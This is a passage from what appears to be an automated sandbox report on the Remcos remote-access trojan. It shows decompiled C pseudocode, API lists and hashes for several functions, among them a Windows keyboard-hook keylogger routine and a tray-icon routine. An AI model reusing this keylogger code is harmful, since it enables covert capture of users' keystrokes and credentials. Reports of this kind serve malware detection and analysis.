                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                              • String ID: a?D
                              • API String ID: 1324828854-2671499184
                              • Opcode ID: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
                              • Instruction ID: 2257eea9d661a44ad8950c31b3f1cc9a1c274aacc0cefe8ff3c2634c143855f4
                              • Opcode Fuzzy Hash: 66d6eff364102b284a7c0bc5fdcf6333283dc1297cb1b8055ba140da389d8a51
                              • Instruction Fuzzy Hash: 2951D0B0A006099FDB14CFA8D881AEEFBF8EF09701F14406BE941E7251E3749A45CF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408894, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                              Download Yara Rule
                              C-Code - Quality: 90%
                              			E00408894(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				signed int _t36;
				void* _t38;

				_t38 = (_t36 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x46baf0 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E0040887D, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t43 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = L00416B7E(_t22,  &_v60, GetLastError());
						_t39 = _t38 - 0x18;
						E004075C4(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
						E00402064(_t22, _t39 - 0x14, "[ERROR]");
						E004165D8(_t22, 0);
						L00401FA7();
						_t8 = 1;
					}
				}
				return _t8;
			}















                              0x0040889a
                              0x0040889e
                              0x004088a3
                              0x004088ab
                              0x00000000
                              0x004088ad
                              0x004088bd
                              0x004088c3
                              0x004088c5
                              0x004088c7
                              0x0040890f
                              0x0040890f
                              0x00408917
                              0x0040891d
                              0x0040891f
                              0x00000000
                              0x00000000
                              0x00408926
                              0x00408931
                              0x00408937
                              0x00408939
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00408939
                              0x0040893b
                              0x0040893b
                              0x004088c9
                              0x004088d5
                              0x004088da
                              0x004088e5
                              0x004088f4
                              0x004088f9
                              0x00408905
                              0x0040890c
                              0x0040890c
                              0x004088c7
                              0x00408942

                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088AF
                              • SetWindowsHookExA.USER32 ref: 004088BD
                              • GetLastError.KERNEL32 ref: 004088C9
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • GetMessageA.USER32 ref: 00408917
                              • TranslateMessage.USER32(?), ref: 00408926
                              • DispatchMessageA.USER32 ref: 00408931
                              Strings
                              • [ERROR], xrefs: 004088EF
                              • Keylogger initialization failure: error , xrefs: 004088DD
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                              • String ID: Keylogger initialization failure: error $[ERROR]
                              • API String ID: 3219506041-2451335947
                              • Opcode ID: 18efa55e4c0aa19a37e2247e024f1a1e12fd5720c569a994fc46527ab49f1f09
                              • Instruction ID: 45d1f3c5768472935d8da96a5f04b23d1a91758f3c86bb8fdf5143b2996172c8
                              • Opcode Fuzzy Hash: 18efa55e4c0aa19a37e2247e024f1a1e12fd5720c569a994fc46527ab49f1f09
                              • Instruction Fuzzy Hash: 8F119DB25002016BC7207BB69D09C6B77ACEA95752B50053EB885D2191EF38DA04C6AA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418680, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00418680(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46bec4 = E00418732();
				0x46bec0->cbSize = 0x1fc;
				 *0x46bec8 = 1;
				 *0x46bed0 = 0x401;
				 *0x46bed4 = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46bed8, "Remcos", 0x80);
				 *0x46becc = 7;
				Shell_NotifyIconA(0, 0x46bec0);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}






                              0x00418699
                              0x004186a4
                              0x004186b2
                              0x004186bc
                              0x004186c6
                              0x004186e5
                              0x004186ea
                              0x004186f6
                              0x00418700
                              0x0041871c
                              0x00418723
                              0x0041872b
                              0x00000000
                              0x00000000
                              0x0041870c
                              0x00418716
                              0x00418716
                              0x00418731

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00418699
                                • Part of subcall function 00418732: RegisterClassExA.USER32(00000030), ref: 0041877E
                                • Part of subcall function 00418732: CreateWindowExA.USER32 ref: 00418799
                                • Part of subcall function 00418732: GetLastError.KERNEL32 ref: 004187A3
                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 004186D0
                              • lstrcpynA.KERNEL32(0046BED8,Remcos,00000080), ref: 004186EA
                              • Shell_NotifyIconA.SHELL32(00000000,0046BEC0), ref: 00418700
                              • TranslateMessage.USER32(?), ref: 0041870C
                              • DispatchMessageA.USER32 ref: 00418716
                              • GetMessageA.USER32 ref: 00418723
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                              • String ID: Remcos
                              • API String ID: 1970332568-165870891
                              • Opcode ID: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
                              • Instruction ID: 76f610ea089cdd7666bb47ab7eed5b25d2d074ad51cd5b102639d92569b498d2
                              • Opcode Fuzzy Hash: f64222c40e49cda82ce2febada2467d24727ed5b3ff0689c3ecc630936eb6d21
                              • Instruction Fuzzy Hash: 98011EB1900308ABD7109FA1EC0CEDA7BBCFB85747F10006AF615D2161EBF995858B9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004450E7, Relevance: 13.8, APIs: 9, Instructions: 300COMMON
                              Download Yara Rule
                              C-Code - Quality: 77%
                              			E004450E7(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = L00439E01();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(L00439E14())) = 9;
						L59:
						_t145 = E0043626D();
						goto L60;
					}
					__eflags = _t213 -  *0x46ba00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0043E61D(_t224, _t158);
								L0043EE85(0);
								L0043EE85(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0044471C(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044D987(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													L00439DDE(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(L00439E14())) = 9;
											 *(L00439E01()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = L00444C43();
												} else {
													_t176 = L00444F53();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = L00444E03(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(L00439E14())) = 0xc;
									 *(L00439E01()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									L0043EE85(_t246);
									return _t242;
								}
							}
							L15:
							 *(L00439E01()) =  *_t206 & _t246;
							 *((intOrPtr*)(L00439E14())) = 0x16;
							E0043626D();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(L00439E01()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(L00439E14())) = 0x16;
					goto L59;
				} else {
					 *(L00439E01()) =  *_t212 & 0x00000000;
					_t145 = L00439E14();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                              0x004450f0
                              0x004450f7
                              0x00445111
                              0x00445113
                              0x0044547b
                              0x0044547b
                              0x00445480
                              0x00445480
                              0x00445488
                              0x0044548e
                              0x0044548e
                              0x00000000
                              0x0044548e
                              0x00445119
                              0x0044511f
                              0x00000000
                              0x00000000
                              0x00445127
                              0x00445133
                              0x00445136
                              0x00445139
                              0x0044513c
                              0x00445143
                              0x00445146
                              0x0044514a
                              0x0044514d
                              0x00445150
                              0x00000000
                              0x00000000
                              0x00445156
                              0x00445159
                              0x0044515f
                              0x00445179
                              0x0044517b
                              0x00445477
                              0x00000000
                              0x00445477
                              0x00445181
                              0x00445185
                              0x00000000
                              0x00000000
                              0x0044518b
                              0x0044518f
                              0x00000000
                              0x00000000
                              0x00445196
                              0x0044519a
                              0x0044519d
                              0x004451a0
                              0x004451a5
                              0x004451a5
                              0x004451a8
                              0x004451c5
                              0x004451ca
                              0x004451cc
                              0x004451ce
                              0x004451ee
                              0x004451ef
                              0x004451f1
                              0x004451f4
                              0x004451f6
                              0x004451f8
                              0x004451fa
                              0x004451fa
                              0x00445205
                              0x00445207
                              0x0044520e
                              0x00445213
                              0x00445216
                              0x00445219
                              0x0044521b
                              0x00445240
                              0x00445245
                              0x0044524c
                              0x0044524f
                              0x00445252
                              0x00445256
                              0x00445258
                              0x0044525c
                              0x0044525e
                              0x00445261
                              0x00445264
                              0x00445266
                              0x00445269
                              0x00445270
                              0x00445273
                              0x00445278
                              0x0044527b
                              0x00445284
                              0x00445288
                              0x0044528b
                              0x0044528e
                              0x00445291
                              0x00445297
                              0x00445299
                              0x004452a2
                              0x004452a5
                              0x004452a8
                              0x004452ab
                              0x004452ac
                              0x004452b0
                              0x004452b6
                              0x004452c0
                              0x004452c5
                              0x004452d5
                              0x004452d9
                              0x004452dc
                              0x004452de
                              0x004452e0
                              0x004452e2
                              0x004452e4
                              0x004452ec
                              0x004452ed
                              0x004452f0
                              0x004452f3
                              0x004452f4
                              0x004452fa
                              0x00445304
                              0x0044530c
                              0x0044530f
                              0x0044531b
                              0x0044531f
                              0x00445322
                              0x00445324
                              0x00445326
                              0x00445328
                              0x0044532a
                              0x00445332
                              0x00445333
                              0x00445336
                              0x00445339
                              0x00445339
                              0x0044533a
                              0x00445340
                              0x0044534a
                              0x0044534a
                              0x00445328
                              0x00445324
                              0x0044530f
                              0x004452e2
                              0x004452de
                              0x004452c5
                              0x00445299
                              0x00445291
                              0x00445350
                              0x00445356
                              0x00445358
                              0x004453cb
                              0x004453cb
                              0x004453cf
                              0x004453df
                              0x004453e5
                              0x004453e7
                              0x00445443
                              0x00445443
                              0x0044544b
                              0x0044544c
                              0x0044544e
                              0x00445467
                              0x0044546a
                              0x004453a7
                              0x004453a8
                              0x00000000
                              0x004453ad
                              0x00445470
                              0x00000000
                              0x00445470
                              0x00445455
                              0x00445460
                              0x00000000
                              0x00445460
                              0x004453e9
                              0x004453ec
                              0x004453ef
                              0x00000000
                              0x00000000
                              0x004453f1
                              0x004453f1
                              0x004453f4
                              0x004453f7
                              0x004453fa
                              0x00445401
                              0x00445406
                              0x00445408
                              0x0044540c
                              0x00445427
                              0x0044542b
                              0x0044542c
                              0x0044542f
                              0x00445430
                              0x0044543c
                              0x00445432
                              0x00445432
                              0x00445432
                              0x0044540e
                              0x0044540e
                              0x0044540e
                              0x00445419
                              0x0044541e
                              0x00445421
                              0x00445421
                              0x00000000
                              0x00445406
                              0x0044535d
                              0x00445360
                              0x00445367
                              0x0044536c
                              0x00000000
                              0x00000000
                              0x00445375
                              0x0044537b
                              0x0044537d
                              0x00000000
                              0x00000000
                              0x0044537f
                              0x00445383
                              0x00000000
                              0x00000000
                              0x00445397
                              0x0044539d
                              0x0044539f
                              0x004453c3
                              0x004453c6
                              0x00000000
                              0x004453c6
                              0x004453a1
                              0x00000000
                              0x0044521d
                              0x00445222
                              0x0044522d
                              0x004453ae
                              0x004453ae
                              0x004453ae
                              0x004453b1
                              0x004453b2
                              0x00000000
                              0x004453ba
                              0x0044521b
                              0x004451d0
                              0x004451d5
                              0x004451dc
                              0x004451e2
                              0x00000000
                              0x004451e2
                              0x004451aa
                              0x004451ad
                              0x004451b7
                              0x004451b7
                              0x004451ba
                              0x004451bd
                              0x00000000
                              0x004451bd
                              0x004451b1
                              0x004451b3
                              0x004451b5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004451b5
                              0x00445161
                              0x00445166
                              0x0044516e
                              0x00000000
                              0x004450f9
                              0x004450fe
                              0x00445101
                              0x00445106
                              0x00445493
                              0x00000000
                              0x00445493

                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d9bd4cba7261bb85346107ed43908dd6911e5a0a1b87e865910dd67f9eedc0de
                              • Instruction ID: d415aa42f168db04541a2b881a195995a4068d2056edb743f6be97fc2ac4bfb3
                              • Opcode Fuzzy Hash: d9bd4cba7261bb85346107ed43908dd6911e5a0a1b87e865910dd67f9eedc0de
                              • Instruction Fuzzy Hash: A1C10971D04749AFEF11DFA9C841BAEBBB4AF09304F18009AE8149B393D7789D41CB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044DA45, Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E0044DA45(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46a00c; // 0x5d382218
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = L0043EE69(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = L0043EE69(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0043E61D(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00450080();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0043E61D(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00450080();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = L00440DAB(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E004304BD(_t130);
													}
												}
											}
										}
									}
								}
								E004304BD(_t100);
							}
						}
					}
				}
				L63:
				return E0042F61B(_v8 ^ _t132);
			}






































                              0x0044da4d
                              0x0044da54
                              0x0044da5c
                              0x0044da5f
                              0x0044da65
                              0x0044da68
                              0x0044da6b
                              0x0044da6f
                              0x0044da72
                              0x0044da77
                              0x0044da9e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044da79
                              0x0044da81
                              0x0044da83
                              0x0044da87
                              0x0044da87
                              0x0044da8c
                              0x0044daaa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044da8e
                              0x0044da97
                              0x0044daac
                              0x0044daac
                              0x0044dab1
                              0x0044dab8
                              0x0044dabb
                              0x0044dabb
                              0x0044dac0
                              0x0044dacc
                              0x0044dad9
                              0x0044dae6
                              0x0044daf9
                              0x00000000
                              0x0044dafb
                              0x0044dafd
                              0x0044db30
                              0x00000000
                              0x0044db32
                              0x0044db34
                              0x0044db38
                              0x0044db3e
                              0x0044db41
                              0x0044db43
                              0x0044db46
                              0x0044db46
                              0x0044db4b
                              0x00000000
                              0x00000000
                              0x0044db4d
                              0x0044db51
                              0x0044db5b
                              0x0044db60
                              0x00000000
                              0x0044db62
                              0x00000000
                              0x0044db62
                              0x0044db60
                              0x00000000
                              0x0044db51
                              0x0044db46
                              0x0044db41
                              0x00000000
                              0x0044db38
                              0x0044daff
                              0x0044db01
                              0x0044db05
                              0x0044db0b
                              0x0044db0e
                              0x0044db10
                              0x0044db10
                              0x0044db15
                              0x00000000
                              0x00000000
                              0x0044db17
                              0x0044db1b
                              0x0044db25
                              0x0044db2a
                              0x00000000
                              0x0044db2c
                              0x00000000
                              0x0044db2c
                              0x0044db2a
                              0x00000000
                              0x0044db1b
                              0x0044db10
                              0x0044db0e
                              0x00000000
                              0x0044db05
                              0x0044dafd
                              0x0044dae8
                              0x0044dae8
                              0x0044dae8
                              0x00000000
                              0x0044dae8
                              0x0044dadb
                              0x0044dadb
                              0x0044dadd
                              0x0044dace
                              0x0044dace
                              0x0044dad0
                              0x0044dad0
                              0x0044db67
                              0x0044db67
                              0x0044db67
                              0x0044db74
                              0x0044db7a
                              0x0044db7f
                              0x0044daa0
                              0x0044db85
                              0x0044db85
                              0x0044db8d
                              0x0044db91
                              0x0044dbec
                              0x0044dbee
                              0x00000000
                              0x0044db93
                              0x0044db98
                              0x0044db9a
                              0x0044db9c
                              0x0044dba4
                              0x0044dbc8
                              0x0044dbcd
                              0x0044dbd2
                              0x0044dbd8
                              0x00000000
                              0x0044dbde
                              0x0044dbde
                              0x00000000
                              0x0044dbde
                              0x0044dba6
                              0x0044dba8
                              0x0044dbac
                              0x0044dbb1
                              0x0044dbb3
                              0x0044dbb8
                              0x0044dccd
                              0x0044dccd
                              0x0044dbbe
                              0x0044dbbe
                              0x0044dbe4
                              0x0044dbe4
                              0x0044dbe7
                              0x0044dbf1
                              0x0044dbf3
                              0x00000000
                              0x0044dbf9
                              0x0044dc01
                              0x0044dc0f
                              0x00000000
